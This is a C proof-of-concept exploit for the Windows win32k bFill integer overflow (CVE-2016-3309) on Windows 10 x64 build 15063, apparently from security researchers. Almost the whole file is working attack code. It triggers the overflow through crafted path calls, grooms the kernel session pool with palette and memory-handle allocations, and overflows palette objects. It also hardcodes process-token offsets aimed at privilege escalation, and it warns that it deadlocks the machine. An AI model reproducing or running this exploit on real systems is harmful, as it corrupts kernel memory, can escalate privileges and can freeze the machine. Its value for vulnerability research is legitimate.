#include <Windows.h>
#include <stdio.h>

/*
0: kd> dt ntdll!_EPROCESS uniqueprocessid token activeprocesslinks.
dtx is unsupported for this scenario.  It only recognizes dtx [<type>] [<address>] with -a, -h, and -r.  Reverting to dt.
+0x2e0 UniqueProcessId     : Ptr64 Void
+0x2e8 ActiveProcessLinks  :
+0x000 Flink               : Ptr64 _LIST_ENTRY
+0x008 Blink               : Ptr64 _LIST_ENTRY
+0x358 Token               : _EX_FAST_REF
*/
typedef struct
{
	DWORD UniqueProcessIdOffset;
	DWORD ActiveProcessLinksOffset;
	DWORD TokenOffset;

	/*
	unfortunately, the nt!EmpCheckErrataList is not exported.
	but you can get the offset like this:
	0: kd> ? nt!EmpCheckErrataList - nt
	Evaluate expression: 1284192 = 00000000`00139860
	*/
	DWORD nt_EmpCheckErrataList_offset;
} VersionSpecificConfig;

VersionSpecificConfig gConfig = { 0x2e0, 0x2e8, 0x358, 0x139860, }; // win10 x64, build 15063.540

bool go = false;
HPALETTE pwnd_palette = 0;
HPALETTE manager_palette = 0;
HPALETTE worker_palette = 0;
BYTE* manager_bits = 0;

typedef struct target_objs_ {
	HPALETTE dummy_palette;
	HPALETTE pwnd_palette;
	HPALETTE manager_palette;
	HPALETTE worker_palette;
}target_objs;

typedef HANDLE(WINAPI* ZwUserConvertMemHandle)(BYTE* buf, DWORD size);
ZwUserConvertMemHandle pfnUserConvertMemHandle = 0;
HANDLE AllocateOnSessionPool(unsigned int size) {
	if (!pfnUserConvertMemHandle) {
		pfnUserConvertMemHandle = (ZwUserConvertMemHandle)GetProcAddress(LoadLibrary("win32u.dll"), "NtUserConvertMemHandle");
		if (!pfnUserConvertMemHandle) {
			// on win8.1 this function is located in user32.dll
			pfnUserConvertMemHandle = (ZwUserConvertMemHandle)GetProcAddress(LoadLibrary("user32.dll"), "NtUserConvertMemHandle");
			if (!pfnUserConvertMemHandle) {
				printf("could not find win32u!NtUserConvertMemHandle. exiting.\n");
				return INVALID_HANDLE_VALUE;
			}
		}
		//printf("pfnUserConvertMemHandle @ 0x%llx\n", (UINT64)pfnUserConvertMemHandle);
	}
	/*
	alloc_size will be passed to HMAllocObject, i.e. pool buffer will be preceded by 0x10 bytes header - that's why we calc -0x10
	the -0x14 comes from win32kfull!ConvertMemHandle  (lea r9d, [rdi+14h])
	*/
	int alloc_size = size - 0x14;
	BYTE *buffer = (BYTE*)malloc(alloc_size);
	memset(buffer, 0x41, alloc_size);
	HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, size);
	BYTE* buf = (BYTE*)GlobalLock(hMem);
	memcpy(buf, buffer, alloc_size);
	HANDLE hMem2 = pfnUserConvertMemHandle(buf, alloc_size);
	GlobalUnlock(hMem);
	return hMem;
}

HPALETTE createPaletteofSize(int size) {
	// we alloc a palette which will have the specific size on the paged session pool. 
	if (size <= 0x90) {
		printf("bad size! can't allocate palette of size < 0x90!\n");
		return 0;
	}
	int pal_cnt = (size - 0x90) / 4;
	int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY);
	LOGPALETTE *lPalette = (LOGPALETTE*)malloc(palsize);
	memset(lPalette, 0x4, palsize);
	lPalette->palNumEntries = pal_cnt;
	lPalette->palVersion = 0x300;
	return CreatePalette(lPalette);
}

void main(int argc, char* argv[]) {

	printf("[+] win32kfull!bFill (aka. CVE-2016-3309) reloaded, @bitshifter123, siberas, 10/2017\n");
	printf("[+] target: Windows 10 x64 RS2 (build 15063.540)\n");
	printf("[+] DEADLOCK-EXAMPLE: CONTINUING FROM HERE WILL DEADLOCK YOUR MACHINE!\n");
	getchar();

	HDC hdc = GetDC(NULL);
	HDC hMemDC = CreateCompatibleDC(hdc);
	HGDIOBJ bitmap = CreateBitmap(0x666, 0x1338, 1, 32, NULL);
	HGDIOBJ bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);
	
	int read_palettes_count = 0x1000;
	PALETTEENTRY *rPalette = (PALETTEENTRY*)calloc(read_palettes_count, sizeof(PALETTEENTRY));
	memset(rPalette, 0x04, read_palettes_count * sizeof(PALETTEENTRY));

	/*
	// offset +0
	0x30: 0x10000 * 0x10000 = 0x10000000 => 0x10000001 * 0x30 = (int32)0x30
	0x60: 0x11 * 0xf0f0f1 = 0x10000001 => 0x10000002 * 0x30 = (int32)0x60
	0x90: 0xc06*0x154ab = 0x10000002 => 0x10000003 * 0x30 = (int32)0x90

	// offset +10
	0x10: 0xccd*0xd552	= 0xaaaaaaa => 0xaaaaaab *0x30 = 0x200000010 = (int32)0x10 => alloc of 0x20
	0x40: 0x3b*0x2e4851	= 0xaaaaaab => 0xaaaaaac *0x30 = 0x200000040 = (int32)0x40 => alloc of 0x50
	0x70: 0x804*0x154ab	= 0xaaaaaac => 0xaaaaaad *0x30 = 0x200000070 = (int32)0x70 => alloc of 0x80
	0xa0: 0x1769*0x74a5	= 0xaaaaaad => 0xaaaaaae *0x30 = 0x2000000a0 = (int32)0xa0 => alloc of 0xb0

	// offset +20
	0x20: 0x27b*0x2266f = 0x5555555 => 0x5555556 * 0x30 = (int32)0x20 => alloc of 0x30 bytes
	0x50: 0x156*0x3FE01 = 0x5555556 => 0x5555557 * 0x30 = (int32)0x50 => alloc of 0x60 bytes
	0x80: 0xa1*0x87af7	= 0x5555557 => 0x5555558 * 0x30 = (int32)0x80 => alloc of 0x90 bytes
	0xb0: 0xfd3*0x5648	= 0x5555558 => 0x5555559 * 0x30 = (int32)0xb0 => alloc of 0xc0 bytes
	0xe0: 0x13369*0x471	= 0x5555559 => 0x555555a * 0x30 = (int32)0xe0 => alloc of 0xf0 bytes
	*/
	int sizeA = 0x1769;
	int sizeB = 0x74a5;
	// both sizes are WITHOUT header, i.e. if they should add up to 0x1000
	// we need for example chunksize 0xf40 and palette_size 0xa0. 0xf40 + 0x10 + 0xa0 + 0x10 == 0x1000
	DWORD chunksize = (DWORD)(((sizeA * sizeB) + 1) * 0x30);
	UINT64 real_size = (((UINT64)sizeA * (UINT64)sizeB) + 1) * 0x30;
	int palette_size = 0x1000 - 0x10 - chunksize - 0x10;
	//printf("[+] sizeA 0x%x\n", sizeA);
	//printf("[+] sizeB 0x%x\n", sizeB);
	printf("[+] prepare int overflow: ((0x%x * 0x%x) + 1) * 0x30 == 0x%llx == (int32) 0x%x\n", sizeA, sizeB, real_size, chunksize);
	//printf("[+] chunksize == 0x%x => palette_size == 0x%x\n", chunksize, palette_size);
	printf("[+] header + chunksize + header + palette_size = 0x%x + 0x10 + 0x%x + 0x10 = 0x%x\n", chunksize, palette_size, chunksize + 0x10 + palette_size + 0x10);

	if (chunksize > 0x1000 ||
		palette_size > 0x1000 ||
		palette_size + chunksize + 0x20 != 0x1000) {
		printf("[-] bad sizes!? exiting!\n");
		return;
	}

	POINT* points = (POINT*)malloc(sizeB * sizeof(POINT));
	DWORD point_value = 0x66000000;
	for (int x = 0; x < sizeB; x++) {
		points[x].x = point_value;
		points[x].y = point_value;
	}

	printf("[BUG 1/4] BeginPath\n");
	if (!BeginPath(hMemDC)) {
		printf("[-] BeginPath() Failed: %x\n", GetLastError());
		return;
	}

	printf("[BUG 2/4] PolylineTo\n");
	for (int j = 0; j < sizeA; j++) {
		if (j == 0)
		{
			points[1].x = 0x11223344;
			points[1].y = 0x360;
			//points[2].x = 1; // overwrite hHmgr with 1
			points[2].x = 0x11223344; // overwrite hHmgr with 0
			points[2].y = 0x400;
		}
		else
		{
			points[1].x = point_value;
			points[1].y = point_value;
			points[2].x = point_value;
			points[2].y = point_value;
		}

		if (!PolylineTo(hMemDC, points, sizeB)) {
			printf("[-] PolylineTo() Failed: %x\n", GetLastError());
			return;
		}
	}

	printf("[BUG 3/4] EndPath\n");
	EndPath(hMemDC);

	printf("[+] now perform pool feng shui...\n");

	SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
	SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);


	// defragment on page level  we will cause 0xfe0 + 0x10 = 0xff0-sized buffers, filling one pool page each
	for (int i = 0; i < 0x400; i++) {
		AllocateOnSessionPool(0xfe0);
	}

	// defragment with chunksize - we will create buffer on pool of size chunsize + 0x10
	for (int i = 0; i < 0x5000; i++) {
		AllocateOnSessionPool(chunksize);
	}

	int create_objs_count = 0x800;
	target_objs* targets_objects = (target_objs*)calloc(create_objs_count, sizeof(target_objs));

	for (int i = 0; i < create_objs_count; i++) {
		targets_objects[i].dummy_palette = createPaletteofSize(palette_size);
		targets_objects[i].pwnd_palette = createPaletteofSize(0xfe0);   // -> pool will be 0xff0 alloc'ed / 0x10 free
		targets_objects[i].manager_palette = createPaletteofSize(0xfe0); // -> pool will be 0xff0 alloc'ed / 0x10 free
		targets_objects[i].worker_palette = createPaletteofSize(0xfe0);  // -> pool will be 0xff0 alloc'ed / 0x10 free
	}

	// now trigger some more chunksize allocations to fill the holes
	for (int i = 0; i < create_objs_count / 2; i++) {
		AllocateOnSessionPool(chunksize);
	}

	// finally, trigger bug in FillPath!
	FillPath(hMemDC);

	SetPriorityClass(GetCurrentProcess(), NORMAL_PRIORITY_CLASS);
	SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);

	printf("[BUG 4/4] hit trigger in FillPath!\n");
	printf("[!] trigger 2nd overflow via SetPaletteEntries - main thread will deadlock now\n");
	printf("[!] as soon as you do a right click somewhere, start a new program or just wait a bit your machine will deadlock, too! :P\n");
	Sleep(100);
			
	for (int i = create_objs_count - 1; i >= 0; i--) {		
		// attempt overflow from pwnd_palette into manager_palette
		// we'll deadlock the machine in one of the SetPaletteEntries calls
		SetPaletteEntries(targets_objects[i].pwnd_palette, 0, 0x1000, rPalette);
	}
}
